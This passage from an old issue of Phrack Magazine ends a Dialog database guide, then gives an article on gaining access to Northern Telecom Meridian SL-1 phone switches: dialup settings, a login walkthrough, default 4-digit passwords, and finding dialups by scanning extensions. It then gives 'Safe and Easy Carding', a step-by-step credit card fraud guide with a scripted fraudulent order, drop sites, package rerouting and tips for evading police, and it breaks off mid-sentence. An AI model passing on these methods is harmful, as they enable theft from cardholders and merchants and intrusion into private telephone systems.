s1/5/1-20 This will "type" the results found in s1, show the whole record (format 5), and display the first twenty records. The command can also be used to directly display an accession number as displayed in the following: T (or TYPE) accession number/format ex. T EJ330267/5 This will display the full record of the "Invitation to a Hacker" (the sample record). Note that most Dialog databases contain citations and sometimes abstracts of articles but NOT the full text of the article. There are some databases that do contain the full text of articles but most don't. The reason most people search these databases is to get a bibliography of articles that have been written on their topic. After reviewing the results of their search, they can decide which if any, of the articles published that they want a copy of. Obtaining full text copies of articles is referred to as 'Document Delivery' service. Sometimes you will see that the newspaper, magazine, or journal that a specific article you obtained a citation of is in your library and can just photocopy it yourself. Other times, the journal may be in another library perhaps hundreds of miles away, in which you can request it via ILL (Inter-Library Loan). And if you have no clue where to find a copy of the source of an article, you can ask Dialog or the individual database supplier to get a copy for you, typically at a cost in upwards of $15.00 for an article from 1 to 20 pages. Fifteen bucks is a bit steep for a 2 page article, so be sure you really need it before ordering. Besides, most articles don't contain as much info that the title or abstract implies it does. If you need direct record access, with any options in the Dialog command system, just input the accession number. All eight formats are shown in the following table. Predefined Formats Table 5 +--------------------------------------------------------------------------+ | Format Number | Record Content | |------------------------------------|-------------------------------------| | 1 | DIALOG Accession Number | | 2 | Full Record except Abstract | | 3 | Bibliographic Citation | | 4 | Full Record with Tagged Fields | | 5 | Full Record | | 6 | Title and DIALOG Accession Number | | 7 | Full Record except Indexing | | 8 | Title and Indexing | +--------------------------------------------------------------------------+ User Defined Format Options --------------------------- If you are not satisfied with the eight formats, you can modify the output to display exactly what you want. The command would look like the following: ex. TYPE S3/AU,TI/1-5 This would exclusively show the author and the title in records one through five. The EXPAND Command ------------------ The EXPAND command allows you to look through the database like looking through a dictionary. The command would look like this: ex. ? E AU=CAPONE, F Ref Items Index-term E1 4 AU=CAPONE, A E2 10 AU=CAPONE, B E3 55 AU=CAPONE, C E4 8 AU=CAPONE, D E5 4 AU=CAPONE, E E6 2 AU=CAPONE, F E7 10 AU=CAPONE, FA E8 912 AU=CAPONE, FB This is an especially useful term or name if you don't know exactly what you are looking for. Conclusion ---------- This file should give you an overview of the Dialog Information System. I exited the hacking world shortly after The Leftist, The Urvile/Necron 99, and The Prophet were arrested in Operation Sundevil, and Digital Logic's Data Service went down permanently along with my sysop access. It wasn't until a few years later did I reenter the computer world to find a whole lot of things to have changed including my hacker ethic. I felt writing this file would be a natural progression from my original hacking talents to "hacking" on a legal basis. I would like to thank Erik Bloodaxe (for encouragement and project ideas) and Lex Luthor (for more project ideas and editing). If you have any questions or comments my Internet address is: alcapone@mindvox.phantom.com. On IRC, I am usually on either #mindvox or #hack so look me up and say "Hey!". ==Phrack Magazine== Volume Four, Issue Forty-Four, File 19 of 27 **************************************************************************** Northern Telecom Meridian SL-1 by Iceman Introduction ~~~~~~~~~~~~ This article is the first in a possible series devoted to Northern Telecom's line of Meridian SL-1 switches. At the moment, I'm unsure if there will even be a second article, since it would consist completely of the programming of these switches, and it's not difficult for me, or anyone else to type up a manual. If you haven't heard of an SL-1 before, to put things simply, if you have ever called a Meridian Voice Mail system, this is the computer that runs the show! Not all SL-1's have Voice Mail features, but it makes things easier (for the electronic adventurer) if you have one that does. Now it's far more than a simple voice mail system, it's a complete phone switch, a PBX. Of course, like most computers, if you can gain access to it, the system is at your beckon call, to do what you make it do. What follows is a brief history, and technical overview of the SL-1 series, as well as information on identifying them. If this looks familiar, a large portion of this article appeared my own magazine, Freedom, but was updated for Phrack. If you had read the issue relating to SL-1's, you will also find basic programming information for some of the more commonly used overlay programs, it was purposely omitted in this article. History and Technical Overview ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Development of Northern Electric's SL-1 started in 1971. Their objective was to design a superior communications system for business subscribers in the range of 100 to 7600 stations. The system had to encompass all the features of a PBX, Centrex and key systems and be economically competitive with them. It had to have new custom services not previously feasible with the older systems. It had to be easy to learn and to operate. As well, it had to be easy to install and maintain. What the designers came up with was a digital, stored program control machine using an 8-bit PCM. They also came up with a new telephone instrument, the SL-1 telephone, which is a multi-line instrument with many features, but uses only 2 pairs of wires, instead of 25 pairs required by key telephones. The SL-1 system has three main parts: The common equipment (CE), the peripheral equipment (PE) and the power supplies. The CE performs the central control and switching functions for all the connecting lines and trunks. It has a central processing unit (CPU) and read/write memory which stores all the operating programs and data unique to the particular system, including switching sequences, feature and class of service information, and numbers and types of terminals. Various models use various media to store information, ranging from magnetic tape drives to disk drives, for high-speed loading of the operating programs and data into the read/write memory, and providing data restoration after a power failure. This media also contains the diagnostic routines, and all software needed to program the switch. There is a Teletype to communicate to the system with and to print error messages on. The network circuits perform the switching duties for all lines and trunks. The digital service circuits provide for such functions as dial and ringing tones and call conferencing. The CE units communicate over a common central bus under control of the CPU. Speech signals, converted to digital, follow a separate path on a network switching bus. The PE performs the interface between the line and trunk circuits and the SL-1 system. It consists mainly of line and trunk cards which convert analog speech to digital signals for digital switching and vice-versa. Lines connect to individual instruments and trunks to other PBX's. Peripheral buffers act as interface between the PE and the CE providing power control, timing and switching control signals for the line and trunk circuits. Digital conversion into 8-bit PCM is done by a single encoder/decoder (codec) for each line or trunk. This codec is a custom LSI circuit. Between the PE and the CE, all signals travel in digital format on time multiplexed loops. Each loops carriers 30 voice channels, one control signalling channel and one unused channel. The channels operate at 64 kbps to give a total data rate of 2.048 mbps. Each loops terminates on a different circuit pack in the CE. There can be up to 16 multiplex loops. When a call is set up, the CPU assigns each party a channel from among the 30 on their own multiplex loops. These channels form a matched pair. For instance, the calling party may use channel 2 of it's digital loop, and the called party may use channel 3 of it's loop. The SL-1 conducts audio digitally. The line and trunk cards contain A/D and D/A converters. Received audio is changed to a digital signal and put on a voice channel. At it's destination, the digital signal is converted back to analog audio. All programming is done from a keyboard with the output going to a printer. To program, a specific diagnostic program, called an overlay, is selected, and is automatically loaded from tape or disk. Once this is done, the appropriate commands are entered to change the options. All inputs, and SL-1 responses are echoed on a printer or echoed out of the specified port. If any system parameters or configurations are changed, these changes will not survive a total power outage unless a new tape or disk is made. In case of a power outage, upon restoration of power, the SL-1 activates the tape or disk unit and loads in the system operating data, and runs some diagnostics. This takes from 5-15 minutes, and at the end of that time, service is fully restored with all the options which were recorded on the tape or disk being implemented. Of course any user-selected options like speed call lists and call waiting which had been selected before the outage will be lost. Automatic diagnostics (called 'background' programs) are being run constantly with the results of any problems being echoed to output. At midnight a more thorough set of diagnostics are run. Any of the diagnostics may be run on demand from the keyboard. Also available on demand from the keyboard are a series of diagnostics to determine the status of lines and trunks, to trace calls, and to print lists and traffic studies. SL-1 Features ~~~~~~~~~~~~~ - Call Waiting - Digitone (DTMF) service - Ring Again - Direct inward dialing - Display services - Direct outward dialing - Tandem switching - Private line service - Special dial tone - Remote administration and - Traffic measurement maintenance - Common control switching - Multi-customer group operation arrangement access - Line/trunk lockout - Data transmission - Flexible numbering system - Access to automatic recorded (2 to 4 digits) answering equipment - Pulse to DTMF conversion - Access to paging equipment - DTMF to pulse conversion - Call forward - busy - Emergency transfer - Call forward - don't answer - Hunting - Call forward - follow me - Intercept - Call pickup - Manual service - Conference (3 or 6 party) - Night service - Service restrictions SL-1 Telephone Set Features ~~~~~~~~~~~~~~~~~~~~~~~~~~~ - Autodial - Automatic preselection - Call status - Headset connection - Call forwarding - Executive override - Call transfer - Hold - Speed calling - On-hook dialing - Call waiting - LED indicators - Tone ringing - Call pickup - Common audible signalling - Loudspeaker/Amplifier - Ring again - Voice calling - Hands free operation - Manual signalling - Multiple appearance directory - 3 or 6 party conference number; multiple call - non-locking keys arrangements - Single appearance directory - Prime directory number number - Station set expansion - Privacy - Privacy release Explanation of Some Features ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Station to station calling - Any station can directly call any other station without attendant assistance. Direct Outward Dialing (DOD) - Allows a station to gain access to the exchange network without attendant assistance and receives a second dialtone. Hunting - Routes a call to an idle station directory number when the called number is busy. The numbers in the hunt group do not have to be in sequence nor do they have to appear on the same instrument. The sequence can be consecutive (station directory numbers are hunted in ascending numerical order) or non-consecutive. Access to paging - Provides a connection to customer-owned paging equipment. Access to Automatic Recorded Answering Equipment - SL-1 stations can have incoming messages recorded on customer-provided answering equipment by forwarding calls to the directory number (DN) assigned to the equipment. Direct Inward Dialing (DID) - Allows an incoming call from the exchange network to reach a station without attendant assistance. The DN for each station will normally be the last 2,3 or 4 digits of the 7 digit exchange network number. Tandem Switching - The SL-1 can act as an intermediate switching point for traffic between other PBX's. Manual Service - Does not provide a dialtone when a station goes off-hook. Instead the attendant is alerted and completes the call for the user. Private Line Service - Permits the appearance of a private central office line on an SL-1 Telephone set. Dialtone is received directly from the telco and calls are not processed by the SL-1. Multi-Customer Group Operation - Allows for the provision of services for more than one business customer from the same switching machine. Each customer is totally separate from the others, may have the same directory numbers as the others, has his own attendant console, his own trunks, and cannot directly call stations belonging to the other customers. Service Restrictions - Allows the ability to restrict various functions. Intercept - Disposes of calls which cannot be completed because of restrictions or dialing errors. They are either routed to the attendant or overflow tone. Special Dial Tone - A Regular dialtone with three 128 ms interruptions at the beginning to advise the user that his hookswitch flash has been successful. Line Lockout - Disconnects stations which have been off-hook for too long to prevent system problems. Night Service - Allows the attendant to preconnect some or all of the incoming telco trunks to selected DN's on the SL-1. Emergency Transfer - Puts the system in the power fail transfer mode. This transfers telco trunks to selected stations to provide some continuity of service to the outside world during the time the SL-1 is inoperative. Remote Administration and Maintenance - Permits operation of the diagnostics from a remote location via a modem and telephone line. You may do anything from the remote terminal that you can do from the local terminal. Call Forward - Busy - Routes incoming calls to another number when the called station is busy. Call Forward - Don't answer - Routes incoming calls to another number when the called station doesn't answer within a prescribed time. Call Forward - Follow me - Routes incoming calls to another, programmable number. Call Waiting - Informs the user of a second incoming call while he is already in conversation. He can then place the first caller on hold and answer the second call. He can then return to the first call. Conference - Allows a user to connect up to either 1 or 4 additional persons into an existing call. Up to 2 of the users may be trunks. Call Pickup - Allows a station to answer an incoming call to another station in the same pickup group by dialing a special code. Ring Again - Permits a calling station, on encountering a busy DN, to operate a dedicated key or dial a special code to have the system monitor the called station and alert him when it goes idle. He is then automatically connect to that station when he goes off-hook or presses the key during the alert and the system rings that station. Data Transmission - The SL-1 is suitable for voiceband data transmissions and is compatible with a conventional modem. SL-1 Models ~~~~~~~~~~~ Model Lines Introduced Generic Features ~~~~~ ~~~~~ ~~~~~~~~~~ ~~~~~~~ ~~~~~~~~ SL1-L 300-700 1975 x01 - N/A SL1-VL 700-2500 1976 x02 - Multi customer operation - Automatic Identification of outward dialing - Do not disturb CDR N/A 1977 x03,x04, - Call detail recording x08 - Recorded Announcement - Digit display console SL1-LE 300-700 1978 x05 - Automatic Route Selection SL1-VLE 700-2500 N/A N/A - Remote peripheral equipment - Automatic Number Identification - "E" system - Autovon SL1-A 60-400 1979 x06,x07, - Centralized attendant service x14 - Automatic call distribution - Digit display SL-1 Sets - 2500 Set Features - Direct inward system access - Dial Intercom - Message Center - Hotel/Motel - International Phase 1 SL1-XL 1000-5000 1980 x09,X17 - Advanced ACD packages - Multiple message center - Integrated voice and data switching - Hospital/Clinic - International Phase 2 ESN N/A 1981 x9000 - Office data administration system - Automatic Wake-up - Room status - Auxiliary data system - Electronic switched network - International Phase 3 SL1-M 60-400 1982 x11 rls 1 - Attendant Administration - Attendant overflow - Automatic set relocation - History file - Call park - Flexible code restriction - System speed call - International Phase 4&5 SL1-S 30-160 1983 x11 rls 4 - Distinctive ringing - Stored number redial - Async. interface module - Sync. data transmission - Multi-channel data system - SL-1 displayphone - Hotel/Motel 'Generic' refers to the software version. It is expressed as a 3 or 4 digit number where the first part of the number indicates the machine it is for and the second part indicates the purpose of the software and serves as a version number and also indicates the type of machine it can be used with. The 'X' stands for a 1 or 2 digit number representing the model: 1 = SL1-L 2 = SL1-VL 3 = SL1-LE 4 = SL1-VLE 5 = SL1-A 6 = SL1-XL 7 = SL1-M/S 8 = SL1-N 9 = SL1-XN 10= SL1-ST 11= SL1-NT 12= SL1-XT Maintenance Programs ~~~~~~~~~~~~~~~~~~~~ All troubleshooting procedures, configuration changes and circuit disabling/enabling are carried out from the keyboard of a Teletype via software programs. There is virtually no physical contact with the exchange other than required to remove a defective board and replace it with a spare. Even this does not require tools. Before running a program you must first gain access to the computer. The dialup will normally be a 1200 baud connection, with an even parity, databits of 7, and stopbits of 1 (E71). Once connected press several times key to wake the system up. The system SHOULD respond with 'OVL111 BKGD' or 'OVL111 IDLE' and now you know it's alright to login. If the response is 'OVL000' and then a '>' prompt you are already logged in, and you can go straight to loading an overlay. Type 'LOGI' to initiate the login. Make sure when entering commands that they are all input in uppercase. The system responds with 'PASS?'. Now enter the password, (we do have a password, RIGHT?), it has a default, like everything else. The password will always be a 4 digit number, other characters are not valid. If you have correctly logged in, the system will respond with a '>' prompt. The system will display this prompt whenever waiting for operator input and is not running a diagnostic program. Once a diagnostic program is running the prompt becomes a '.' (period). If you are not logged in, there is no prompt. What follows is an example of what you will see during login. { Hit Carriage Return } OVL111 IDLE . . .LOGI { Initiate Login } PASS? { Enter password, it will not echo } OVL015 { Error code for incorrect password } TTY 01 SCH MTC 16:40 OVL 45 BKGD .LOGI { Try again } PASS? . > OVL000 >LD 22 { You are now logged in and ready to load an overlay program } { in this case we are loading overlay 22, a print routine. } PT20000 REQ TID { The REQ prompt appears, now enter your selection, in this } { case we want to print the TID (Tape ID) } TAPE ID: LOADED XXXXXX DISK/TAPE XXXXXX REQ ISS { Enter ISS to view the Issue and Release number of the } { software/switch } VERSION 1011 RELEASE 14 ISSUE 39 REQ END { Enter END to quit this overlay } >LOGO > . { Logout and hangup } Now after gaining this information, we can determine what type of system we're dealing with. Notice that the version number is 1011. Now refer back to the listing of SL-1 Models for the information we seek. We are logged into an x11 system (last 2 digits of the version number). Unfortunately, there are two system with x11 generics, and none of which have a release number of 14, so we're either dealing with an SL1-M or an SL1-S, with either a 60-400 or 30-160 line capability respectively. Although this information isn't extremely useful, it comes in handy when determining how large the system is. Overlay Programs ~~~~~~~~~~~~~~~~ Upon first logging in, no program is loaded, and you must load a program (overlay) into system memory. This is done by the command 'LD' followed by a space and the overlay number. To load overlay 10 you would simply do a 'LD 10'. It will take approximately 1 minute to load the overlay into memory from tape, if the system uses a tape drive. If the system uses disk storage then it will load quickly. Once the program is loaded, a 'REQ' (request) prompt will appear. The system is now waiting for input from the administrator. There are many different overlays which can be used, all of which are explained in the following section. Number Name Purpose ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 10 500/2500 Type Allows new 500/2500 telephone data blocks to be Telephone generated, existing office data modified, moved to a new TN location on the same loop, or removed from the system. Standard telephone sets. 11 SL-1 Type Allows new SL-1 telephone data blocks to be Telephone generated, existing office data to be modified, moved to a new TN location on the same loop, or removed from the system. 12 Attendant Allows new SL-1 attendant console data blocks to be Console generated, existing office data to be modified, moved to a new TN location on the same loop, or removed from the system. 13 DIGITONE Allows new DIGITONE and SL-1 tone detectors blocks Receiver and to be generated, moved to a new TN location on the SL-1 Tone same loop, or removed from the system. Detectors 14 Trunks Allows new trunk data blocks to be generated, existing office data modified, moved to a new TN location on the same loop, or removed from the system. 15 Customer Allows new customer data blocks to be generated, existing office data modified, or removed from the system. 16 Trunk Route/ Allows new trunk/ATM route and ATM schedule hours Automatic Trunk data blocks to be generated, existing office data Maintenance modified, or removed from the system. 17 Configuration Allows the configuration record to be modified to Record reflect changes in the system parameters. 18 Speed Call Allows speed call/system speed call and group call Group Call Data data to be generated, modified, or removed from the system. 19 Code Restriction Allows code restriction data block to be generated, modified, or removed from the system. 20 Print Routine 1 Allows the printing of: - SL-1 TN data blocks - 500 TN data blocks - attendant TN data blocks - trunk TN data blocks - DIG data blocks - group call data - templates - speed call lists - hunting patterns of stations - unused units - unused card positions - terminal numbers 21 Print Routine 2 Allows the printing of: - customer data blocks - code restriction data blocks - route data blocks - a list of trunks in a route - ATM data - ATM schedules - TN associated with CAS keys 22 Print Routine 3 Allows the printing of: - the configuration record - directory number to TN matrix - equipped packages - history - password numbers - ROM QPC number - station category indication - version and issue of generic 23 ACD/Message Allows ACD data, ACD management report schedules, Center and Message Center data to be generated, modified, or removed. 24 DISA Allows data for direct inward system access to be generated, modified or printed. 25 Move Data Allows movement or interchanges of data between Blocks loops, shelves and packs in the same customer group. 26 Do Not Disturb Allows DND groups to be formed, changed, merged, removed or printed. 28 ANI Route Allows ANI route selection data block to be Selection generated, modified, removed, or printed. 29 Memory/ Used to determine the amount of unused memory, and Management to determine if enough memory is available to add new data. Also used to respond to error messages SCH601 and 603 on Meridian SL-1 XN systems. 49 NFCR Allows code restriction data blocks to be defined, modified, removed, or printed. 50 Call Park Allows call park data to be generated, modified, removed, or printed. 73 Digital Trunk Allows Digital Trunk Interface data to be generated Interface or modified. 81 Features/ Allows stations to be listed or counted according Stations Print to their features. 82 Hunt Chain/ Allows printing of hunting patterns and multiple Multiple appearance groups. Appearance Print 83 TN Sort Print Allows printing of stations according to station DES. 84 DES Entry Allows the assignment of station DES (description) to 500/2500 sets. 85 DES Entry Allows the assignment of station DES (description) to SL-1 sets. 86 ESN 1 Allows electronic switched network data defining BARS/NARS/CDP features to be generated, modified, or printed. 87 ESN 2 Allows electronic switched network data defining BARS/NARS/CDP features to be generated, modified, or printed. 88 Authorization Allows data for Basic Authorization Code (BAUT) and Code Network Authorization Code (NAUT) to be generated, modified, or printed. 90 ESN 3 Allows data for ESN network translation tables to be generated, modified, or printed. 93 Mult-Tenant Used to enable and administer multi-tenant service. Service For example, more than one company can use the same PBX. Those are the main overlays used to modify setups and print the system configuration information. SL-1's are mainly used in buildings, and by larger companies, ranging from department stores to complete office complexes. The dialups are commonly found on an extension of the PBX. You can generally come across the dialup while scanning extensions on a Meridian Voice Mail system. Meridian SL-1's are a very common switch used on WATS lines, generally by larger companies. I've also talked to several people who have encountered the actual dialup modem to the switch on the public phone network (exchange scanning). Once you have found one, it's easy to identify with it's trademark 'OVL' greeting. Meridian Manager ~~~~~~~~~~~~~~~~ Obviously SL-1 administrators can't be expected to program a switch using such archaic methods, and remembering every prompt and required input. Northern Telecom has developed terminal software that makes the job easier, which replaces the traditional teletype setup with a PC running their terminal software. Each copy of the software is sold at upwards of $5000 for a site license, and you are entered into a license agreement with NT. As Northern Telecom puts it... "Title to and ownership of Meridian SL-1 software shall at all times remain with Northern Telecom. Meridian SL-1 software shall not be sold outright and the use thereof by the customer shall be subject to the parties entering into software agreement as specified by Northern Telecom." Each copy contains a serial number which matches the PBX's own serial number, thus cannot be used on any switch other than one specified in your license agreement. The software provides a user friendly method to add, remove, and modify information, without dealing with the unfriendly switch directly. Initially the software will phone the specified switch, and check the serial number of the switch. After this, it will load and run the print overlays, and ascii capture all output, building several database files locally, on your own system. After this is completed, it disconnects, and you now have the complete configuration of the switch sitting on your system. You now make the necessary modifications, and upon completion, the software again calls the switch, and updates the switches database. The software, called the Meridian Manager, comes complete with a full internal tutorial on how to use it, and is very helpful. Thanks Northern Telecom, for making it so easy! Additional Information ~~~~~~~~~~~~~~~~~~~~~~ If you require programming information, probably the handiest piece of material that I've found is the Data Administration, Generic X11 : Pocket Reference Guide. This is a pocket book that contains a listing of all Overlay Programs, possible inputs and error codes. The reference is about 100 pages, and can be ordered from Northern Telecom, the order number being P0674785,S086/01. Social Engineering may be required. * Meridian and SL-1 are trademarks of Northern Telecom Limited. Greetings to Talsfalon, Akalabeth, Okinawa, Mechanix, and all those I've forgotten. See you at hohocon, we'll be giving away one of the previously mentioned Pocket Reference Guide's at the raffle. I can be reached at my email address, iceman@silicon.bison.mb.ca, or my own system at 204-669-7983. -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3 mQCNAiwKJFQAAAEEALaKeir7NjTo0SawUR5jC7EIxTl+f1Yv3AvxwmHMOC0aZJwq WHqZajrdQ0UXKS6j/2bKgFwfuo76O/KeZmuo4Q05JLRl1epO6SfGMjfSP0zR2y0n 2oSsiA9VNpI/eeZAqJpa15ItpWEXZOwNIHKvTjEqOjADwtVCvkRf68TwYncbAAUR tCNJY2VtYW4gPGljZW1hbkBzaWxpY29uLmJpc29uLm1iLmNhPg== =BlEm -----END PGP PUBLIC KEY BLOCK----- Iceman * The Digital Resistance * ==Phrack Magazine== Volume Four, Issue Forty-Four, File 20 of 27 [** NOTE: The following file is presented for informational and entertainment purposes only. Phrack Magazine takes NO responsibility for anyone who attempts the actions described within. **] **************************************************************************** SSSSS AAAAA FFFFF EEEEE AAAAA N N DDDD EEEEE AAAAA SSSSS Y Y S A A F E A A NN N D D E A A S Y Y SSSSS AAAAA FFF EEE AAAAA N N N D D EEEEE AAAAA SSSSS Y S A A F E A A N N N D D E A A S Y SSSSS A A F EEEEE A A N N DDDD EEEEE A A SSSSS Y CCCCCCCC AAAAAAAA RRRRRRRR DDDDDDD IIIIIIII NN NN GGGGGGGG CC AA AA RR RR DD DD II NNNN NN GG CC AA AA RR RR DD DD II NN N NN GG CC AAAAAAAA RRRRRR DD DD II NN N NN GG GGGG CC AA AA RR RR DD DD II NN NNN GG GG CCCCCCCC AA AA RR RR DDDDDDD IIIIIIII NN NN GGGGGGGG BY VaxBuster This file is ONLY to be published in Phrack, and has not and will not be released, or published in any other magazine. And a disclaimer: I do not engage in, or condone ANY illegal activity, including credit card fraud, and this article should be used for INFORMATIONAL PURPOSES ONLY. Those wishing to engage in unlawful activities should be warned that there are severe penalties that exist that could render the remainder of your life useless. In the past few years, I have had a ton of people come up and ask, "I want to card something, but I'm afraid I'll get caught because I don't really know what I'm doing, can u give me tips?" This article is designed for those people, people who already have carded and are looking for better/easier ways to do it. One point you'll see me address VERY strongly in this article is safety. I don't want to see any of my friends end up in jail. See, like any unlawful activity, you are going to have certain risks, and this article is designed to ELIMINATE those risks, or narrow them down tremendously. I'm going to take you step by step through the ENTIRE process from the time you pick up the phone until the time you are safely at home reading the manual to your new toy. Stage One - Getting the credit card information Getting the information is probably going to be the easiest of all the steps involved here. You could go trashing at your local restaurant, retail store, or bank. You could open up Federal Express boxes and find them there. You could hack into an establishment and get them from there. It doesn't really matter HOW you get it, but you want to make sure you get the person's full name, their complete credit card number, their expiration, and hopefully an address. In the event that you found the credit card number locally and just have the name, check your local White Pages for their address or use a service like Compuserve to pull up their address. You'll probably find that the address closest to the store is the right one. Also, if you can get a hold of the issuing bank, this will help. Stage Two - Verifying the credit card information There are several ways you can do this. And remember when you are doing this that it would be VERY helpful to get the available line of credit. 1> If you have the issuing bank, call the bank and ask for their AUTOMATED CREDIT SERVICE. They ALL have them. Its an 800 number and it's printed on the back of the card. Basically, this service is set up so that credit card holders can check their available balance, available credit, etc. Usually, they have SOME kind of security that prevents the normal person from walking up and typing in someone else's number. This security is lame. You either have to know the last 4 digits of their social security number or their zip code. 99 times out of 100, you'll find that you'll need their zip code though. 2> So you don't have the issuing bank? Just use a credit card verifier with a merchant number. Don't place a HUGE purchase, it can be any amount, so make it small, like say $8.31 or something. 3> Use a 800 porn service that accepts credit cards. 4> Use a credit bureau like CBI, TRW, or InfoAM. These services are very nice because you can easily check their available credit line. It also has other information that could be useful. Remember, when you are doing this, don't make the calls from your house, and if it's impossible to do otherwise, go through a divertor and a code. Put a couple of levels of protection between YOU and them. This will cut down on any tracks leading back to you. Stage Three - Finding the company You are looking for a relatively small company - one that has what you need in stock, but not one that needs operators to answer calls. Most places (even retail stores like Radio Shack) will ship out to anyone any place in the US. Just tell them you are handicap, or can't get around very well, and they will be more than happy to help. You want to find a place that has Federal Express. And of course, you're looking for one that accepts the type of card that you have. Incidentally, for those who are VERY new at this : If first digit of card is a: 3 American Express (15 digits) 4 Visa (13 or 16 digits) 5 Mastercard (16 digits) 6 Discover (16 digits) Stage Four - Placing the call Ok, before we go any further, make sure you have a call back number. I use a VMB that is in the local area that I'm supposedly calling from. You should almost always be calling for a business, because companies treat businesses better than your standard customer. Tell them you need to have the products the VERY next day, and if they can't have it to you by then, tell them you'll find another company (Hell, who wants to wait? :) ) When you call them, just relax, and pretend like your just placing an order for yourself, nothing is out of the ordinary, but you just need to start that special project in the morning. Make sure you have all the information in front of you. Call during business hours, not on Friday, Saturday, or Sunday. Here's a transcript of one of my calls: "Hello XXX, this is Mark can I help you?" (always get their name) "Yes, My name is Joe and I'm calling from XXX, I'd like to place an order." "Ok sir, I'd more than happy to help you, let me get some info from you first. Ok. Can I have your name?" "Joseph XXX" "Your address, Joe?" "XXXX XXXX lane, and thats in XXXXXXX XX, the zip there is XXXXX" "Ok, and a number where we can reach you if there is any problems?" "XXX-XXX-XXXX" "Ok, what would you like to order?" "I need four of those laser jet printers, I believe I spoke with someone on Friday about them, and the part number is XXXXX-XX. Also, I had a question on those printers too, what type of warranty do they carry?" (Always ask about warranty!) "Well sir, these particular models have one year parts and labor warranty. You can buy an additional 5 year warranty for only $49 a piece too. We have an unconditional guarantee of 90 days." "Ok, I'll take the 5 year warranty on all of them then." "Do you need any toner cartridges, or printer paper?" "No, all I need are the printers." "Ok, how would you like these shipped?" "You have Federal Express, right?" "Yeah." "Ok, Ship them PRIORITY overnight then." "Ok, and how are you paying for your order?" "With our corporate XXXXXX card." "Ok, can I have your account number?" "Sure its XXXX-XXXX-XXXX-XXXX" "Ok, and the Billing information is the same as your ship to address ?" "Thats right." "Ok, then this package will go out today, and you'll have the printers by tomorrow morning." "Ok, and can you do me a favor?" "Sure." "Whenever your shipping department ships the package, get the Federal Express Tracking Number for me, and leave it on my Voice Mail System?" "Sure, I'll do that personally later on tonight." "Ok. Thank you very much." "Thank YOU sir." Ok - a few things I want to mention. First, try to determine what type of credit card authorization they have. If its retail store, they probably just have ZION terminals, just the standard type or swipe style. These don't check the address, or anything, just to make sure the card is valid and has enough credit left. The other type check all the info, including the name and address. Its very important that you are SHIPPING to the BILLING address, because if you change the ship to, they may have a tendency to get a tad suspicious. Also, the reason you could use that you need the Fedex Tracking Number is for your Mail room. Use your imagination, but keep your story the same, don't adlib too much, cause you may fuck up, but stick to the above format, it works very well. Always try to be as pleasant as possible, because in the event you couldn't check the credit limit, you may have to give them another card. Stage 5 - Finding a drop site This is one of the harder things to do. If the billing address of the card is local to you, you may just want to go their house to pick up the package. If not, find an apartment building close (but not too close) to where you live. Or find a house that has a for sale sign in the front yard. Or if you know some school buddy of yours that is away for vacation use his house (In that event, make SURE he has NO idea your doing this) Whatever the case may be, just find a place that is relatively secluded from the street, where there are places for you to park inconspicuously. Apartment buildings work EXTREMELY well. Stage 6 - Rerouting the package This is a little trick one of my good friends showed me. It works extremely well. Call up Federal Express with your airbill number. The number is 800-238-5355. Tell them that you are not going to be in town that day to sign for your package that you will be at another location, and ask them if they could please send the package to a new address. They may say that it will take an additional day to do that, depending on how far away it is. INSIST that it arrives the next day, tell them its extremely important, and don't take any shit from them, ask for their supervisor if they gave you any problems. Their commitment is overnight. By the way, call Federal Express AS SOON AS you know they physically have the package, this way you give them as much time as they need to reroute. Obviously your sending the package to your drop site that you found. Stage 7 - Picking up the package This is by far the most DANGEROUS part of it. If you are going to get caught, this is where its going to happen. DON'T have a school buddy pick it up for you. Instant doom. DON'T pay someone to do it for you, lord knows they will sell you out in a second. Not to mention, you're probably brighter than the average eggplant, so you may be able to talk your way out. "A guy on the street paid me this $20 bill to do it, I said what the fuck" PLEASE USE EXTREME CAUTION WHEN DOING THIS. OK. Call Federal Express, and make sure the package will be arriving that day, and that everything is on schedule. Ask them what the route number is, an estimate of when it will be there, and their commitment time for that particular zip code. Then, go there earlier than you need to be, and check out the place, look around for anyone who seems abnormal, look for escape routes, exits. Look around, get a feel for where you are, and try to ration out why you might just be standing there or why you would have needed to pick up the package. Remember, if you used all the precautions I've talked about, you should be in perfect shape. Just relax, be cool, and everything will work out. Walk around for a little bit, and find out the possible directions the Federal Express Van will be coming from. Walk in front of the house just when he arrives. Pretend as though your just on your way home or just on your way out the door. Sign for it, and you're done. Ok, you say, I'm the nervous type, and I don't want the guy giving my description to the police, FBI, etc. (As though they will remember 1 out of the hundreds of deliveries a day) Call up Federal Express and ask for a signature release. This gives Fedex the right to leave the package at your front door, and this removes their responsibility. OR, leave a note with your signature (not printed) on the door, mailbox, etc. Remember though that the guy may come home (or look out his window) and see the package, or you signing it. Remember there is nothing saying that you have to be there when the package arrives. You can get a signature release or leave a note. Make sure you are there as soon as possible AFTER they leave the package. I actually prefer to be there, because when I just let it go, and check back later, it is almost NEVER there. Either a> someone stole it b> a neighbor picked it up and put it in their house for them c> the owner is actually home and got the package (which is REALLY bogus, cause it's on their card!) I have ALWAYS used an apartment building. I have ALWAYS been there to pick the package up. I have never been busted. See, if you understand how the system works, you know that there is NO way that anyone knows that it is an illegal purchase. If you look at it on a time line : <----2:00pm-------2:05pm------8:00pm-----10am---> verify call reroute pickup Now, if there is a problem, it will probably be either a> not enough credit left on the card (which is nothing, they will leave a message on your vmb) b> they called directory assistance and actually called that number or c> VISA/MC/AMEX/DISC called the customer to verify the purchase because it was larger than usual. So obviously, if they got in touch with the card holder, or visa/etc called the card holder, they AREN'T going to ship the package - meaning you aren't going to show up anyways. Of course you never use a drop site more than once, you never use a company more than once, and you never use a card more than once. Once you get your package, KEEP YOUR MOUTH SHUT. Don't jump on IRC, and say, "Hey Cameron, I just carded a new Amiga 4000." And if you do eventually tell someone that you carded it, NEVER USE ANY SPECIFICS, no information about the company, the drop house, the name on the card, NOTHING. If you follow these instructions, you can guarantee you will have absolutely no problems, I have been doing this for quite some time, and have NEVER been bothered by any law enforcement concerning this. I have never found anyone who was careful that got busted. The people who have gotten busted for carding have either bragged about it, or let someone know before hand, or have been set up. I have tried to cover all bases, but I'm positive I've missed a few so if anyone has questions, let me know. I am always open to helping people and can be found on the IRC, in either #hack or one of the better #hack alternatives. In addition to carding by phone, there is another possibility, that is writing credit 